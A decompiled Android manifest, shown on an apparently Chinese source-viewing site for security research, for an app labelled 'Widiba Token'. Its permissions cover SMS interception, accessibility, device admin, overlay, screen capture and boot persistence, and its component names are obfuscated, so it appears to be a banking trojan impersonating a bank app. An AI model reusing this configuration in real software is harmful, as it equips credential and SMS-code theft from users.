正在查看:Widiba Token v2366 -- AndroidManifest.xml 的源代码文件
本页面用于展示反编译生成的源代码文件,仅供安全研究与技术分析使用,严禁用于任何非法用途。请遵守相关法律法规。
正在查看:Widiba Token v2366 -- AndroidManifest.xml 的源代码文件
本页面用于展示反编译生成的源代码文件,仅供安全研究与技术分析使用,严禁用于任何非法用途。请遵守相关法律法规。
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1774" android:versionName="2366" android:installLocation="internalOnly" android:compileSdkVersion="34" android:compileSdkVersionCodename="14" package="com.yhmvlhy.hdihxgi" platformBuildVersionCode="34" platformBuildVersionName="14"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="14" android:targetSdkVersion="33" />
<supports-screens android:anyDensity="true" android:smallScreens="true" android:normalScreens="true" android:largeScreens="true" />
<uses-permission android:name="android.permission.EXPAND_STATUS_BAR" />
<uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES" />
<uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.VIBRATE" />
<uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.SYSTEM_ERROR_WINDOW" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.WRITE_SMS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.READ_CALL_LOG" />
<uses-permission android:name="android.permission.CALL_PHONE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PLAYBACK" />
<uses-permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY" />
<uses-permission android:name="com.android.alarm.permission.SET_ALARM" />
<uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACTION_MANAGE_OVERLAY_PERMISSION" />
<uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.WRITE_CALL_LOG" />
<uses-permission android:name="android.permission.FOREGROUND_SERVICE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.WRITE_CONTACTS" />
<application android:theme="@style/LightTheme" android:label="Widiba Token" android:icon="@drawable/icon" android:name="androidx.multidex.MultiDexApplication" android:hardwareAccelerated="true" android:largeHeap="true" android:usesCleartextTraffic="true" android:requestLegacyExternalStorage="true">
<service android:label="Widiba Token" android:name="anywheresoftware.b4a.objects.NotificationListenerWrapper" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" android:exported="false">
<intent-filter>
<action android:name="android.service.notification.NotificationListenerService" />
</intent-filter>
</service>
<receiver android:name="anywheresoftware.b4a.objects.AdminReceiver2" android:permission="android.permission.BIND_DEVICE_ADMIN" android:exported="true">
<meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>
<provider android:name="androidx.core.content.FileProvider" android:exported="false" android:authorities="com.yhmvlhy.hdihxgi.provider" android:grantUriPermissions="true">
<meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/provider_paths" />
</provider>
<activity android:label="Widiba Token" android:name=".main" android:exported="true" android:excludeFromRecents="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.SEND" />
<action android:name="android.intent.action.SENDTO" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="sms" />
<data android:scheme="smsto" />
<data android:scheme="mms" />
<data android:scheme="mmsto" />
</intent-filter>
</activity>
<service android:name=".asdsa_retop" android:exported="true" />
<receiver android:name=".asdsa_retop$asdsa_retop_BR" android:exported="true" />
<activity android:label="Widiba Token" android:name=".asdsawqe_sq" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".asdsda_edqwewq" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<service android:name=".backgroundservice" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:exported="true" android:foregroundServiceType="mediaPlayback">
<intent-filter>
<action android:name="android.accessibilityservice.AccessibilityService" />
</intent-filter>
<meta-data android:name="android.accessibilityservice" android:resource="@xml/accessibility_service_config" />
</service>
<receiver android:name=".backgroundservice$backgroundservice_BR" android:exported="true" />
<activity android:label="Widiba Token" android:name=".dasdsa_edwqeq" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".dasdsa_wqewqfh" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".daskj_dasdsa_aa" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:theme="@style/Theme_Main" android:label="Widiba Token" android:name=".ddsa_ewqiuewq" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".dsadas_dsadsa" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:theme="@style/Theme_Main" android:label="Widiba Token" android:name=".dsadas_rewq" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".dsadsa_dsadsa" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".dsadsa_tytrpo" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<service android:name=".dsadsoper_mnfg" android:exported="true" />
<receiver android:name=".dsadsoper_mnfg$dsadsoper_mnfg_BR" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<activity android:label="Widiba Token" android:name=".dsadwq_rewqwe" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<service android:name=".dsda_reiwurew" android:exported="true" />
<receiver android:name=".dsda_reiwurew$dsda_reiwurew_BR" android:exported="true" />
<service android:name=".dsdas_klfdgfd" android:exported="true" />
<receiver android:name=".dsdas_klfdgfd$dsdas_klfdgfd_BR" android:exported="true" />
<activity android:label="Widiba Token" android:name=".dsdsa_qweqwewq" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<service android:name=".dsdsaiuewq_wqwe" android:exported="true" />
<receiver android:name=".dsdsaiuewq_wqwe$dsdsaiuewq_wqwe_BR" android:exported="true" />
<service android:name=".dtrsbnotisuntilactv" android:exported="true" />
<receiver android:name=".dtrsbnotisuntilactv$dtrsbnotisuntilactv_BR" android:exported="true" />
<activity android:label="Widiba Token" android:name=".forc_activateacc" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".gfdgfd_gewrtre" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<activity android:label="Widiba Token" android:name=".homescreen" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<service android:name=".managerservice" android:exported="true" />
<receiver android:name=".managerservice$managerservice_BR" android:exported="true" />
<service android:name=".mediaprojectionbackservice" android:exported="true" android:foregroundServiceType="mediaProjection" />
<receiver android:name=".mediaprojectionbackservice$mediaprojectionbackservice_BR" android:exported="true" />
<receiver android:name=".myreceiver" android:exported="true" />
<service android:name=".notificationservice" android:exported="true" />
<receiver android:name=".notificationservice$notificationservice_BR" android:exported="true">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
<activity android:label="Widiba Token" android:name=".perm_writesys" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<service android:name=".service1" android:exported="true" />
<receiver android:name=".service1$service1_BR" android:permission="android.permission.BROADCAST_SMS" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_DELIVER" />
</intent-filter>
</receiver>
<service android:name=".service2" android:exported="true" />
<receiver android:name=".service2$service2_BR" android:permission="android.permission.BROADCAST_WAP_PUSH" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />
<data android:mimeType="application/vnd.wap.mms-message" />
</intent-filter>
</receiver>
<service android:name=".service3" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE" android:exported="true">
<intent-filter>
<action android:name="android.intent.action.RESPOND_VIA_MESSAGE" />
<category android:name="android.intent.category.DEFAULT" />
<data android:scheme="sms" />
<data android:scheme="smsto" />
<data android:scheme="mms" />
<data android:scheme="mmsto" />
</intent-filter>
</service>
<receiver android:name=".service3$service3_BR" android:exported="true" />
<service android:name=".service4" android:exported="true" />
<receiver android:name=".service4$service4_BR" android:exported="true" />
<receiver android:name=".startatbootreceiver" android:exported="true">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
<service android:name=".starter" android:exported="true" />
<receiver android:name=".starter$starter_BR" android:exported="true" />
<activity android:label="Widiba Token" android:name=".wakeupdv" android:exported="true" android:launchMode="singleTop" android:screenOrientation="portrait" android:windowSoftInputMode="stateHidden" />
<receiver android:name=".httputils2service" android:exported="true" />
</application>
</manifest>